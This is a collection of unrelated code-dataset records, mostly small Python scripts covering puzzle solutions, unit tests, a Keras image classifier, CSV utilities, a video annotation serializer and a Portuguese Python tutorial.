\"dojo/unittests/scans/gitlab_dep_scan/gl-dependency-scanning-report-many-vuln.json\"\n )\n parser = GitlabDepScanParser()\n findings = parser.get_findings(testfile, Test())\n self.assertTrue(len(findings) > 2)\n","sub_path":"dojo/unittests/tools/test_gitlab_dep_scan_parser.py","file_name":"test_gitlab_dep_scan_parser.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"439585982","text":"#http://adventofcode.com/2015/day/14\n\n#1\n\nwith open('Reindeer_Olympics.input', 'r') as f:\n reindeers=f.read()\n nochar=['can fly ', 'km/s for ', 'seconds, but then must rest for ', ]\n for i in nochar:\n if i in reindeers:\n reindeers=reindeers.replace(i, '')\n\n zoo={} \n \n for sor in reindeers.splitlines():\n data = sor.split(' ')\n zoo.setdefault(data[0], [int(data[1]), int(data[2]), int(data[3])]) # rénszarvas: sebesség, haladás, pihenő\n print(zoo)\n\n\n#Given the descriptions of each reindeer (in your puzzle input), after exactly 2503 seconds, \n#what distance has the winning reindeer traveled?\n\n\ndistance=0\nfor k, v in zoo.items():\n base=int(2503 / (v[1] + v[2]))\n d=base * v[0] * v[1]\n m = 2503 % (v[1] + v[2])\n if m > v[1]:\n p = v[1] * v[0]\n else:\n p = m * v[0]\n distance=max(distance, d+p)\n\nprint('A győztes által megtett út:', distance, '\\n')\n\n#2\nwith open('Reindeer_Olympics.input', 'r') as f:\n reindeers=f.read()\n nochar=['can fly ', 'km/s for ', 'seconds, but then must rest for ', ]\n for i in nochar:\n if i in reindeers:\n reindeers=reindeers.replace(i, '')\n\n zoo={} \n points={}\n dist={}\n for sor in reindeers.splitlines():\n data = sor.split(' ')\n zoo.setdefault(data[0], [int(data[1]), int(data[2]), int(data[3])]) # rénszarvas: sebesség, haladás (mp), pihenő (mp)\n points.setdefault(data[0], 0) # rénszarvas: pontok\n dist.setdefault(data[0], 0,) # rénszarvas: megtett út\n print(zoo)\n\n\n \nn=0\n\nwhile n < 2503:\n for k, v in zoo.items():\n m = n % (v[1] + v[2])\n if m < v[1]:\n dist[k]=dist[k] + v[0]\n dd=max(dist.values())\n for l, w in dist.items():\n if w==dd:\n points[l]=points[l] + 1\n n+=1\n\n\nprint(points)\nprint(dist)\nwin=max(points, key=lambda x: points[x])\nprint('A győztes: ', win, ', aki ' , dist[win], ' km utat tett meg és ', points[win], ' pontot szerzett.', sep='')\n","sub_path":"14_Reindeer_Olympics.py","file_name":"14_Reindeer_Olympics.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"441420098","text":"from __future__ import unicode_literals\n\nfrom django.contrib.localflavor.pt.forms import PTZipCodeField, PTPhoneNumberField\n\nfrom django.test import SimpleTestCase\n\n\nclass PTLocalFlavorTests(SimpleTestCase):\n def test_PTZipCodeField(self):\n error_format = ['Enter a zip code in the format XXXX-XXX.']\n valid = {\n '3030-034': '3030-034',\n '1003456': '1003-456',\n }\n invalid = {\n '2A200': error_format,\n '980001': error_format,\n }\n self.assertFieldOutput(PTZipCodeField, valid, invalid)\n\n def test_PTPhoneNumberField(self):\n error_format = ['Phone numbers must have 9 digits, or start by + or 00.']\n valid = {\n '917845189': '917845189',\n '91 784 5189': '917845189',\n '+351 91 111': '+35191111',\n '00351873': '00351873',\n }\n invalid = {\n '91 784 51 8': error_format,\n '091 456 987 1': error_format,\n }\n self.assertFieldOutput(PTPhoneNumberField, valid, 
invalid)\n","sub_path":"tests/regressiontests/localflavor/pt/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"308655612","text":"'''Print the First 3 multiples of the given number \"N\". (N is a positive integer)\n\nNote: print the characters with a single space between them.\n\nInput Description:\nA positive integer is provided to you as an input.\n\nOutput Description:\nPrint the First 3 multiples of the number with single spaces between them as an output.\n\nSample Input :\n2\nSample Output :\n2 4 6'''\n\ncode\n\nN=int(input())\nfor x in range(1,4):\n a=x*N\n if(x<3):\n print(a,end=' ')\n else:\n print(a)\n","sub_path":"python/774.py","file_name":"774.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"507527609","text":"# import\nfrom sklearn.preprocessing import LabelBinarizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom tensorflow.keras.preprocessing.image import img_to_array\nfrom shallownet import ShallowNet\nfrom tensorflow.keras.optimizers import SGD\nfrom imutils import paths\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nimport cv2\nimport os\nimport random\n\n# construct argument parser\nap = argparse.ArgumentParser()\nap.add_argument(\"-d\", \"--dataset\", required=True,\n\thelp=\"path to the dataset\")\nargs = vars(ap.parse_args())\n\n# grab the images\nprint(\"[INFO] loading images...\")\nimagePaths = list(paths.list_images(args[\"dataset\"]))\nrandom.shuffle(imagePaths)\n# load a batch of images\nimagePaths = imagePaths[:100]\n\n# preprocess the images\ndata = []\nlabels = []\n\nfor (i, imagePath) in enumerate(imagePaths):\n image = cv2.imread(imagePath)\n image = cv2.resize(image, (32, 32))\n image = img_to_array(image)\n label = imagePath.split(os.path.sep)[-1].split(\".\")[0]\n\n data.append(image)\n labels.append(label)\n\n if i != 0 and i % 1000 == 0:\n print(\"[INFO] processing {}/{}...\".format(i, len(imagePaths)))\n # print(labels)\n\ndata = np.array(data)\ndata = data.astype(\"float\") / 255.0\nlabels = np.array(labels)\n\n# split the dataset into train/test\n(trainX, testX, trainY, testY) = train_test_split(data,\n\tlabels, test_size=0.25)\n\n# convert the target int to vectors\ntrainY = LabelBinarizer().fit_transform(trainY)\ntestY = LabelBinarizer().fit_transform(testY)\n\n# compile model\nprint(\"[INFO] compiling model...\")\nopt = SGD(0.005)\nmodel = ShallowNet.build(width=32, height=32, depth=3, \n\tclasses=2)\nmodel.compile(loss=[\"sparse_categorical_crossentropy\"], optimizer=opt,\n\tmetrics=[\"accuracy\"])\n\n# train the network\nprint(\"[INFO] training model...\")\nH = model.fit(trainX, trainY, validation_data=(testX, testY),\n\tbatch_size=32, epochs=100, verbose=1)\n\n# evaluate the model\nprint(\"[INFO] evaluating model...\")\npredictions = model.predict(testX, batch_size=32)\nprint(classification_report(testY.argmax(axis=1),\n\tpredictions.argmax(axis=1), \n\ttarget_names=[\"cat\", \"dog\"]))\n\n# plot the training loss and accuracy\nplt.style.use(\"ggplot\")\nplt.figure()\nplt.plot(np.arange(0, 100), H.history[\"loss\"], label=\"train_loss\")\nplt.plot(np.arange(0, 100), H.history[\"val_loss\"], label=\"val_loss\")\nplt.plot(np.arange(0, 100), H.history[\"accuracy\"], label=\"train_acc\")\nplt.plot(np.arange(0, 100), 
H.history[\"val_accuracy\"], label=\"val_acc\")\nplt.title(\"Training loss and accuracy\")\nplt.xlabel(\"Epoch #\")\nplt.ylabel(\"Loss/Accuracy\")\nplt.legend()\nplt.show()","sub_path":"Starter/11_ShallowNet/shallownet_animals.py","file_name":"shallownet_animals.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"88691029","text":"#=============================================================================#\n# #\n# MIT LICENSE Copyright (c) 2019 David Longnecker #\n# #\n# Permission is hereby granted, free of charge, to any person obtaining a #\n# copy of this software and associated documentation files (the \"Software\"), #\n# to deal in the Software without restriction, including without limitation #\n# the rights to use, copy, modify, merge, publish, distribute, sublicense, #\n# and/or sell copies of the Software, and to permit persons to whom the #\n# Software is furnished to do so, subject to the following conditions: #\n# #\n# The above copyright notice and this permission notice shall be included in #\n# all copies or substantial portions of the Software. #\n# #\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING #\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER #\n# DEALINGS IN THE SOFTWARE. #\n# #\n#=============================================================================#\n\n\nimport driver.ast_source as ast_source\nimport driver.ast_lexer as ast_lexer\nimport driver.ast_parser as ast_parser\nimport driver.compiler as compiler\nimport driver.tools as tools\nimport sys\n\n\n_prompt = '[kmo-driver]'\n_driver_map = {\n '--ast-source' : ast_source.main,\n '--ast-lexer' : ast_lexer.main,\n '--ast-parser' : ast_parser.main,\n '--compiler' : compiler.main\n}\n\n\ndef _run_driver(args):\n if len(args) <= 1:\n tools.display('Select a driver to run: ', _prompt)\n for driver in _driver_map.keys():\n msg = ' ' + driver\n tools.display(msg)\n tools.exit(0)\n driver = args[1]\n if driver not in _driver_map:\n raise tools.DriverError('Unrecognized driver: ' + driver)\n tools.display('Running driver: ' + driver, _prompt)\n tools.display('---', _prompt)\n entrypoint = _driver_map[driver]\n argv = args[1:]\n code = entrypoint(argv)\n tools.display('---', _prompt)\n tools.display('Exit code: ' + str(code), _prompt)\n tools.exit(code)\n return\n\n\ndef main(args):\n try:\n _run_driver(args)\n except tools.DriverError as err:\n tools.display('ERROR: ' + str(err), _prompt)\n tools.exit(1)\n assert(false)\n return 0\n\n\nif __name__ == '__main__':\n main(sys.argv)\n\n","sub_path":"driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":3119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"153192760","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nThis script renames columns in CSV file.\n\"\"\"\n\nimport sys\n\nimport pandas\n\n\ndef main():\n \"\"\"\n Main entry point into the script.\n \"\"\"\n if len(sys.argv) < 5 and len(sys.argv) % 2 == 0:\n print('USAGE: csv_rename.py CSV_FILE_IN CSV_FILE_OUT COLUMN_1_FROM COLUMN_2_FROM ... 
COLUMN_1_TO COLUMN_2_TO ...') # noqa: E501 pylint: disable=C0301\n    else:\n        csv = pandas.read_csv(sys.argv[1])\n        flat = sys.argv[3:]\n        half = len(flat) // 2\n        before = flat[:half]\n        after = flat[half:]\n        translation = dict(zip(before, after))\n        csv.rename(columns=translation, inplace=True)\n        csv.to_csv(sys.argv[2], index=False)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"csv-rename/csv_rename.py","file_name":"csv_rename.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"558864715","text":"# Given a binary search tree with non-negative values, find the minimum absolute difference between values of any two nodes.\n\n# Example:\n\n# Input:\n\n# 1\n# \\\n# 3\n# /\n# 2\n\n# Output:\n# 1\n\n# Explanation:\n# The minimum absolute difference is 1, which is the difference between 2 and 1 (or between 2 and 3).\n# Note: There are at least two nodes in this BST.\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n\nimport sys\n\n# don't know why this is wrong\n# (likely because 'l' is a class attribute: it is shared across calls, so it keeps growing)\nclass Solution(object):\n    l = []\n    def inOrder(self, root):\n        if not root: return\n        self.inOrder(root.left)\n        self.l.append(root.val)\n        self.inOrder(root.right)\n\n    def getMinimumDifference(self, root):\n        \"\"\"\n        :type root: TreeNode\n        :rtype: int\n        \"\"\"\n        self.inOrder(root)\n\n        m = sys.maxsize\n\n        for a, b in zip(self.l, self.l[1:]):\n            if abs(a - b) < m:\n                m = abs(a - b)\n\n        return m\n\nclass Solution(object):\n    def getMinimumDifference(self, root):\n        \"\"\"\n        :type root: TreeNode\n        :rtype: int\n        \"\"\"\n        l = []\n        def inOrder(root):\n            if not root: return\n            inOrder(root.left)\n            l.append(root.val)\n            inOrder(root.right)\n        \n        inOrder(root)\n\n        m = sys.maxsize\n\n        for a, b in zip(l, l[1:]):\n            if abs(a - b) < m:\n                m = abs(a - b)\n\n        return m","sub_path":"LC/Easy/530.py","file_name":"530.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"188680258","text":"# -*- coding: utf-8 -*-\n\n# Insere novo Produto\n\nimport csv\nimport os\n\ndados_produto = dict()\n\ndef new_Produto():\n\tprint('\\n')\n\twhile True:\n\n\t\tprint('\\t\\tNOVO PRODUTO')\n\n\t\tnome_produto = input('- NOME: ')\n\t\tdados_produto['NOME'] = nome_produto\n\n\t\tdescricao = input('- DESCRIÇÃO: ')\n\t\tdados_produto['DESCRIÇÃO'] = descricao\n\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tquantidade = int(input('- QUANTIDADE: '))\n\t\t\t\tdados_produto['QUANTIDADE'] = quantidade\n\t\t\t\tbreak\n\t\t\texcept ValueError:\n\t\t\t\tprint('Digite apenas numeros real')\n\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tvalor = float(input('- VALOR UNITÁRIO: '))\n\t\t\t\tdados_produto['VALOR'] = valor\n\t\t\t\tbreak\n\n\t\t\texcept ValueError:\n\t\t\t\tprint(\"Somente numeros com formato 2.99 são aceitos.\\nUse ponto, não virgula\\nTente novamente.\")\n\n\n\t\tgravando_dados = open(\"Produtos.csv\", \"at\")\n\t\ttry:\n\t\t\twrite = csv.writer(gravando_dados)\n\t\t\tif os.stat(\"Produtos.csv\").st_size == 0:\n\t\t\t\twrite.writerow(dados_produto.keys())\n\t\t\twrite = csv.writer(gravando_dados)\n\t\t\twrite.writerow(dados_produto.values())\n\n\t\tfinally:\n\t\t\tgravando_dados.close()\n\n\t\tprint('INFO: REGISTRO ARMAZENADO COM SUCESSO\\n\\n')\n\n\t\tadd_produto = input('Deseja cadastra novo produto(Y/n): ')\n\t\tif add_produto == 'Y' or add_produto == 
'y':\n\t\t\tcontinue\n\t\telse:\n\t\t\tbreak\n","sub_path":"ProgramacaoI/Fruteira/Inserir_Produto.py","file_name":"Inserir_Produto.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"378171729","text":"import sys\nfrom itertools import combinations\nfrom copy import deepcopy\nfrom collections import deque\ninput = sys.stdin.readline\n\nn, m = map(int, input().split()) # 연구소의 크기, 바이러스의 개수\nboard = [list(map(int, input().split())) for _ in range(n)]\nvirus = []\nfor i in range(n):\n for j in range(n):\n if(board[i][j] == 2): # 바이러스 위치 찾기\n virus.append([i, j])\n\ncomb = list(combinations(virus, m)) # 바이러스 m개 조합\n\ndx, dy = [0, 1, 0, -1], [1, 0, -1, 0]\n\ndef check(board): # 빈칸이 없는지 and 최솟값\n cnt = 0\n flag = 0\n for i in range(n):\n for j in range(n):\n if(board[i][j] == 0):\n return False\n if(board[i][j] < cnt):\n flag = 1 # 1초라도 흘렀음\n cnt = board[i][j]\n if(flag == 0): # 1초도 안흐름\n return \"0\"\n else:\n return cnt\n\ndef dfs(active):\n tempboard = deepcopy(board)\n q = deque(active)\n cnt = 1 # 경과 시간\n visited = [[0]*n for _ in range(n)]\n temp = []\n while(q):\n while(q):\n x, y = q.popleft()\n visited[x][y] = 1\n for j in range(4):\n nx = x + dx[j]\n ny = y + dy[j]\n if(0<=nx 0:\n frame = draw_masks_from_json(frame, cnn_dict['detection_masks'], track_dict[str(frame_idx)])\n cv2.rectangle(frame, (int(frame_width * roi[1]), int(frame_height * roi[0])),\n (int(frame_width * roi[3]), int(frame_height * roi[2])), (255, 0, 0), 3)\n cv2.putText(frame, f\"visitors = {visitors}, attendants = {incoming}\", (0, 45), font, 2, (0, 0, 255), 2, cv2.LINE_AA)\n frames_queue.put(frame)\n cnn_dict = cnn_queue.get()\n (grabbed, frame) = capturer.read()\n if frame_idx % 30 == 0:\n print(\"frame = \", frame_idx, \" of \", total_frames, \" queue = \", cnn_queue.qsize())\n print(\"time for processing 1 frame = \", time.time() - timer)\n frame_idx += 1\n frames_queue.put('finished')\n\n\ndef load_json_track(filename):\n json_track_path = os.path.join(os.getcwd(), 'jsons', filename + '_tracks.json')\n with open(json_track_path) as fp:\n track_content = fp.readlines()\n track_dict = json.loads(track_content[0])\n return track_dict\n\n\ndef write_video(filename, frames_queue, fps=30):\n out_videopath = os.path.join(os.getcwd(), 'videos_output', filename)\n frame = frames_queue.get(30)\n frame_height, frame_width = frame.shape[:2]\n fourcc = cv2.VideoWriter_fourcc(*'DIVX')\n video = cv2.VideoWriter(out_videopath, fourcc, fps, (frame_width, frame_height))\n while frame != 'finished':\n video.write(frame)\n frame = frames_queue.get(30)\n video.release()\n\n\ndef get_frame_with_boxes(frame, boxes):\n frame_height, frame_width = frame.shape[0], frame.shape[1]\n for box in boxes:\n cv2.rectangle(frame, (int(frame_width * box[1]), int(frame_height * box[0])),\n (int(frame_width * box[3]), int(frame_height * box[2])), (0, 255, 0), 3)\n return frame\n\n\ndef draw_masks_from_json(frame, masks, track_records):\n masks_filter = np.zeros(frame.shape).astype(np.float64)\n masks = np.array(masks)\n for record in track_records:\n masks_filter = masks_filter + np.equal(masks, record[1] + 1)[:, :, np.newaxis] * get_random_color(record[2])\n frame = np.minimum(frame + (masks_filter * 100), 255).astype(np.uint8)\n return frame\n\n\ndef get_random_color(idx):\n r.seed(idx + 15574)\n rgb = np.array([r.random(), r.random(), r.random()]).T\n return rgb\n\n\ndef get_frame_with_masks(frame, masks):\n masks_filter = 
np.zeros(frame.shape).astype(np.float64)\n masks_indexes = masks.shape[2]\n for i in range(masks_indexes):\n mask = masks[:, :, i, np.newaxis]\n rgb = np.array([r.random(), r.random(), r.random()]).T\n masks_filter = masks_filter + mask * rgb\n frame = np.minimum(frame + (masks_filter * 100), 255).astype(np.uint8)\n return frame\n\n\nif __name__ == '__main__':\n visualize('Venice-2.mp4')\n # '''\n","sub_path":"computer_vision_project/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":8058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"505791788","text":"# Given a string containing just the characters '(' and ')', find the length of the longest valid (well-formed) parentheses substring.\n\n# Example 1:\n\n# Input: \"(()\"\n# Output: 2\n# Explanation: The longest valid parentheses substring is \"()\"\n# Example 2:\n\n# Input: \")()())\"\n# Output: 4\n# Explanation: The longest valid parentheses substring is \"()()\"\n\nclass Solution:\n def longestValidParentheses(self, s):\n\n\n\n # count = 0\n if not s:\n return 0\n len_s = len(s)\n i = 0\n while i < len_s and s[i] == ')':\n # if :\n i += 1\n end = len_s\n while end > i and not self.IsPar(s[i:end]):\n end -= 1\n count = end - i\n if end == 0:\n end = 1\n # print(count,s[end:])\n return max(count,self.longestValidParentheses(s[end:]))\n\n\n def IsPar(self,s):\n if s[0] == ')':\n return False\n list_items = []\n for i in range(len(s)):\n if s[i] == ')' and len(list_items) > 0:\n if list_items[-1] == '(':\n list_items.pop()\n else:\n list_items.append(s[i])\n return not list_items\n\n\n def longestValidParentheses_dp(self, s):\n dp, stack = [0]*(len(s) + 1), []\n for i in range(len(s)):\n if s[i] == '(':\n stack.append(i)\n else:\n if stack:\n p = stack.pop()\n \n dp[i + 1] = dp[p] + i - p + 1\n print(p,i, dp[p] + i - p + 1,dp)\n return max(dp)\n \n def mylongestvp(self,s):\n dp = [0]*(len(s)+1)\n max_len = 0\n stack = []\n for i in range(len(s)):\n if s[i] == '(':\n stack.append(s[i])\n if len(stack) > 0 and s[i] == ')':\n stack.pop()\n dp[i+1] = dp[i] + 2\n dp[i+1] = dp[i+1] + dp[i+1-dp[i+1]]\n if dp[i+1] > max_len:\n max_len = dp[i+1]\n return max_len\nif __name__ == \"__main__\":\n s = \"()\"\n print(Solution().longestValidParentheses_dp(s))\n print(Solution().mylongestvp(s))\n","sub_path":"001-050/032.longestvalidparetheses.py","file_name":"032.longestvalidparetheses.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"57137654","text":"#from linespace import Linespace\nimport csv\nimport profiles\nclass Track:\n # Takes inputs in metric measures, specifically takes location is kilometers,\n # speed in km/h, dwell time in seconds, and gradient in m/km\n def __init__(self):\n #self.length = max(track_km)\n self.velocity_mps = velocity_profile(step_size)[1] # velocity limit in m/s\n self.velocity_m = velocity_profile(step_size)[0] # velocity zones in meters\n self.velocity_mph = self.velocity_mps*2.23694 # velocity limit in mps\n self.velocity_mi = self.velocity_m*0.000621371 # velocity zones in miles\n self.velocity_kph = self.velocity_mps*3.6 # velocity limit in km/h\n self.velocity_km = self.velocity_m*1000 # velocity zones in km\n self.stopLocKm = [] # stop location in km\n self.dwellTimeS = [] # stop dwell time in seconds\n self.stopLocMiles = [] # stop location in Miles\n self.dwellTimeMinutes = [] # stop dwell time in minutes\n self.stopLocMeters = [] # 
stop location in meters\n self.dwellTimeHours = [] # stop dwell time in hours\n self.velocityKmph = [] # velocity limit in km/h\n self.velocityZoneKm = [] # velocity zones in km\n self.velocityMph = [] # velocity limit in mph\n self.velocityZoneMiles = [] # velocity zones in miles\n \n self.gradeLocKm = [] # gradient zones in km\n self.gradePercent = [] # gradient (percent rise/run)\n self.gradeLocMeters = [] # gradient zones in Meters\n self.gradeLocMiles = [] # gradient zones in miles\n \n\n\n def create(self,speed_prof,station_loc,gradient_prof):\n # Step 1: Read velocity zone restrictions from csv into list\n gradient_prof = pd.read_csv(gradient_prof)\n velocity_profile = pd.read_csv(speed_prof).append(pd.read_csv(station_loc)).fillna(0)\n\n\n #trackMiles = []\n #trackMPH = []\n #with open(speed_prof, 'r') as csvfile:\n # spamreader = csv.reader(csvfile)\n # for row in spamreader:\n # if len(row) > 1:\n # trackMiles = trackMiles + [float(row[0])] # miles\n # trackMPH = trackMPH + [float(row[1])] # miles\n #trackKM = [entry * 1.6 for entry in trackMiles] # miles to km\n #trackKMPH = [entry*1.609 for entry in trackMPH] # mph to km/h \n ## Add Velocity Limit:\n #for i in range(0,len(trackKMPH)):\n # self.velocity_kph.append(trackKMPH[i]) \n # self.velocity_km.append(trackKM[i])\n # self.velocity_mps.append(trackKMPH[i]*0.277778) \n # self.velocityZoneMeters.append(trackKM[i]/1000)\n # self.velocityMph.append(trackKMPH[i]*0.621371689334) \n # self.velocityZoneMiles.append(trackKM[i]*0.621371689334)\n ## Step 2: Read station location from csv into list\n #stationLocation = []\n #stationDwell = []\n #with open(station_loc, 'r') as csvfile:\n # spamreader = csv.reader(csvfile)\n # for row in spamreader:\n # if len(row) > 1:\n # stationLocation = stationLocation + [float(row[0])] # miles\n # stationDwell = stationDwell + [float(row[1])] # seconds\n # If dwell time is zero seconds, delete that row\n #for i in range(0,len(stationDwell)):\n # if len(stationDwell) >= i: # rechecks length of stationDwell since we delete some of its rows\n # if stationDwell[i] == 0:\n # del stationDwell[i]\n # del stationLocation[i]\n #stationLocationKM = [entry*1.6 for entry in stationLocation] # mph to km/h\n ## Add Stops:\n #for i in range(0,len(stationLocationKM)):\n # self.stopLocKm.append(stationLocationKM[i]) \n # self.dwellTimeS.append(stationDwell[i])\n ## Step 3: Read gradient data from csv into list\n #gradientLocation = []\n #gradient = []\n #with open(gradient_prof, 'r') as csvfile:\n # spamreader = csv.reader(csvfile)\n # for row in spamreader:\n # if len(row) > 1:\n # gradientLocation = gradientLocation + [float(row[0])] # miles\n # gradient = gradient + [float(row[1])] # miles\n #gradientLocationKM = [entry*1.6 for entry in gradientLocation] # mph to km/h\n ## Add Gradient Profile:\n #for i in range(0,len(gradientLocationKM)):\n # self.gradeLocKm.append(gradientLocationKM[i])\n # self.gradePercent.append(gradient[i]) \n #def add_stop(self, stop_location, dwell_time):\n #def add_vel_limit(self, kmph, km):\n #def add_grade(self, gradeLoc, grade):\n\n #def reverse():\n # #trackKM = list(reversed([entry * 1.6 for entry in trackMiles])) # miles to km\n # trackKMPH = list(reversed([entry*1.609 for entry in trackMPH])) # mph to km/h\n # trackKMPH[0] = trackKMPH[1]\n # trackKMPH[-1] = 0\n # gradient = list(reversed(gradient))\n # gradientLocationKM = list(reversed(gradientLocationKM))\n # #stationDwell = list(reversed(stationDwell))\n # #print 'Reversed gradientLocationKM is' ,gradientLocationKM\n \n # 
##################\n # trackKM = [max(trackKM)-entry for entry in trackKM]\n # #print 'Reversed stationLocationKM:' , stationLocationKM\n # trackKM = list(reversed(trackKM))\n # print 'Reversed Speed Zones:', trackKM\n # print 'Reversed Speed Limits:', trackKMPH\n # #diff = []\n # #for i in range(0,len(trackKM)-1):\n # # diff = diff + [trackKM[i]-trackKM[i+1]]\n # #trackKM[0] = 0\n # #for i in range(1,len(trackKM)):\n # # trackKM[i] = trackKM[i-1] + ( diff[i-1] ) \n # #print 'Reversed trackKM' ,trackKM\n # #############\n # diff = []\n # for i in range(0,len(gradientLocationKM)-1):\n # diff = diff + [gradientLocationKM[i]-gradientLocationKM[i+1]]\n # gradientLocationKM[0] = 0\n # for i in range(1,len(gradientLocationKM)):\n # gradientLocationKM[i] = gradientLocationKM[i-1] + ( diff[i-1] ) \n # #print(gradientLocationKM)\n # ##################\n # diff = []\n # for i in range(0,len(stationLocationKM)-1):\n # diff = diff + [stationLocationKM[i+1]-stationLocationKM[i]]\n # print 'diffs:' , diff\n # stationLocationKM = [max(stationLocationKM)-entry for entry in stationLocationKM]\n # #print 'Reversed stationLocationKM:' , stationLocationKM\n # stationLocationKM = list(reversed(stationLocationKM))\n # print 'before stationLocationKM', stationLocationKM\n # # If dwell time is zero seconds, ignore that row\n # for i in range(0,len(stationDwell)):\n # if len(stationDwell) >= i: # rechecks length of stationDwell since we delete some of its rows\n # if stationDwell[i] == 0:\n # del stationDwell[i]\n # del stationLocationKM[i]\n # print 'after stationLocationKM', stationLocationKM\n # print 'Reversed Dwells', stationDwell","sub_path":"track.py","file_name":"track.py","file_ext":"py","file_size_in_byte":7242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"457622726","text":"\n\nfrom xai.brain.wordbase.nouns._shanty import _SHANTY\n\n#calss header\nclass _SHANTIES(_SHANTY, ):\n\tdef __init__(self,): \n\t\t_SHANTY.__init__(self)\n\t\tself.name = \"SHANTIES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"shanty\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_shanties.py","file_name":"_shanties.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"639138579","text":"\n# coding: utf-8\n\n# # Índice\n# \n# \n# * [Operadores de atribuição](#Operadores-de-atribuição)\n# * [Trabalhando com datas e horas](#Trabalhando-com-datas-e-horas)\n# * [Lendo de bancos de dados](#Lendo-de-bancos-de-dados)\n# * [Funções](#Funções)\n# * [Condicionais](#Condicionais)\n# * [Loops](#Loops)\n# * [Conjuntos](#Conjuntos)\n# * [Listas](#Listas)\n# * [Tuplas](#Tuplas)\n# - [Usando listas para iteradores em loops](#Usando-listas-para-iteradores-em-loops)\n# * [Dicionários](#Dicionários)\n# * [Lendo dados](#Lendo-dados)\n# * [Lendo dados estruturados com pandas](#Lendo-dados-estruturados-com-pandas)\n# * [Lendo imagens com scikit-image](#Lendo-imagens-com-scikit-image)\n# * [Lendo arquivos XML](#Lendo-arquivos-XML)\n# * [Condicionando os dados](#Condicionando-os-dados)\n# * [Trabalhando com variáveis categóricas](#Trabalhando-com-variáveis-categóricas)\n# * [Trabalhando com datas](#Trabalhando-com-datas)\n# * [Tratando dados faltantes](#Tratando-dados-faltantes)\n# * [Fatiando](#Fatiando)\n# * [Concatenando e transformando](#Concatenando-e-transformando)\n# * [Agregação](#Agregação)\n\n# Operadores de atribuição\n# =========\n# [voltar](#Índice)\n\n# 
In[40]:\n\nmyvar = 2\nprint(\"myvar = %d\" %myvar)\nmyvar += 5\nprint(\"myvar += 5\\n%d\" %myvar)\nmyvar -= 2\nprint(\"myvar -= 2\\n%d\" %myvar)\nmyvar *= 2\nprint(\"myvar *= 2\\n%d\" %myvar)\nmyvar /= 4\nprint(\"myvar /= 4\\n%d\" %myvar)\nmyvar %= 2\nprint(\"myvar %%= 2\\n%.1f\" %myvar)\nmyvar **= 2\nprint(\"myvar **= 2\\n%.2f\" %myvar)\nmyvar *= 10\nprint(\"myvar *- 10\\n%.1f\" %myvar)\nmyvar //= 2\nprint(\"myvar //= 2\\n%d\" %myvar)\n\n\n# Trabalhando com datas e horas\n# =============\n# [Voltar](#Índice)\n\n# In[83]:\n\nfrom datetime import datetime as dt\nfrom datetime import timedelta\nprint('Microssegundo atual',dt.now().microsecond,'\\n\\n')\nhorainicio = dt.now()\nprint('Data e hora atual:', dt.now())\nprint('Hora atual:',dt.now().time())\nprint('Data atual:',dt.now().date())\nprint('Timezone:',dt.now().tzinfo)\n#Transformando string em datetime\nh1 = dt.strptime('11:23:22', '%H:%M:%S')\nh2 = dt.strptime('22:35:49', '%H:%M:%S')\nprint('A diferença entre',h1.time(),'e',h2.time(),'é',h1-h2)\nprint('Oops... A diferença na verdade é', h2-h1,'\\n\\n')\nhorafim = dt.now()\nprint('Microssegundo final',dt.now().microsecond)\ntdelta = horafim - horainicio\nprint(\"Tempo de processamento em microssegundos: %d\" %tdelta.microseconds)\n\n\n# Funções\n# =======\n# [Voltar](#Índice)\n\n# 